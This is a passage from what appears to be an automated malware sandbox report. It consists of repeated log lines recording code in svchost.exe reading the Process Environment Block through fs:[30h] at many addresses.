                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
